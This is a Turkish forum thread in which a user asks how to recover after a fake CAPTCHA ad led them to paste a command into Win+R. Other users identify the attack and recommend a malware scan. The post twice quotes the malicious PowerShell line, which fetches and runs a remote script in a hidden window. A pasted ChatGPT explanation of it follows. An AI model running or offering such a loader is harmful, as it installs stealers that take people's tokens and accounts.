bu illetten nasıl kurtulcam

• Konuyu Başlatan Konuyu Başlatan xlaeuss
  • Başlangıç tarihi Başlangıç tarihi

xlaeuss

Banned
Bu kullanıcıyla herhangi bir iş veya ticaret yapmak istiyorsanız, forumdan uzaklaştırıldığını sakın unutmayın.
beyler psd indiriyodum bi reklama attı sabah sabah dalgınlıktan yapmışım
win r
ctrl v
yapıştırdıgı kod
POWERshElL -w 1 . IEX((' {(IWR (Get-ChildItem Variable:_).Value)}).Content) # ''I am not a robot: rėCAΡTCHA Verification ID: 7811''
gece macosdan girip herkese steam mesajı attı ( pc kapadıgımda)
bende gece telden sif falan değişdim tokenı cekmesın dıye int çektim discord appdata ve locali falan sildim
bu illetten nası kurtulcam bi windows kurulu disk var bide harddisk? önemli dosyalarımı harddiske atsam harddiskide cekiyomudur??

beyler psd indiriyodum bi reklama attı sabah sabah dalgınlıktan yapmışım
win r
ctrl v
yapıştırdıgı kod
POWERshElL -w 1 . IEX((' {(IWR (Get-ChildItem Variable:_).Value)}).Content) # ''I am not a robot: rėCAΡTCHA Verification ID: 7811''
gece macosdan girip herkese steam mesajı attı ( pc kapadıgımda)
bende gece telden sif falan değişdim tokenı cekmesın dıye int çektim discord appdata ve locali falan sildim
bu illetten nası kurtulcam bi windows kurulu disk var bide harddisk? önemli dosyalarımı harddiske atsam harddiskide cekiyomudur??
Hangi Stealer ?

Bu kullanıcıyla herhangi bir iş veya ticaret yapmak istiyorsanız, forumdan uzaklaştırıldığını sakın unutmayın.
kimse cevap vermedi diye gptye sordum

Ne Yapıyor?

1. PowerShell çalıştırılıyor:
    • POWERshElL -w 1 .
    • -w 1 ile pencere gizli modda açılıyor (hızlıca kapanıyor).
  2. İnternetten Bir Script İndiriliyor ve Çalıştırılıyor:
    • IEX((' {(IWR (Get-ChildItem Variable:_).Value)}).Content)
    • "nopaste.net" sitesinden bir PowerShell komutu indirip hemen çalıştırıyor.
  3. Muhtemelen Token Grabber, RAT veya Keylogger Çalıştırıyor
    • Discord/Steam token'larını, tarayıcı çerezlerini çalıp bir saldırgana gönderiyor olabilir.
    • Uzak masaüstü bağlantısı (RAT) açabilir.

yok 14 day free trial veriyor indirince aktifleştir öyle tarat

normalde free premium üyelik alabilirsin istiyorsan
malwarebytes 15dt çıktı hepsini sildim simdi napmam lazım otkenım dusermı dc indirip girsem

Şuanda konuyu görüntüleyen kullanıcılar

Geri
Üst Alt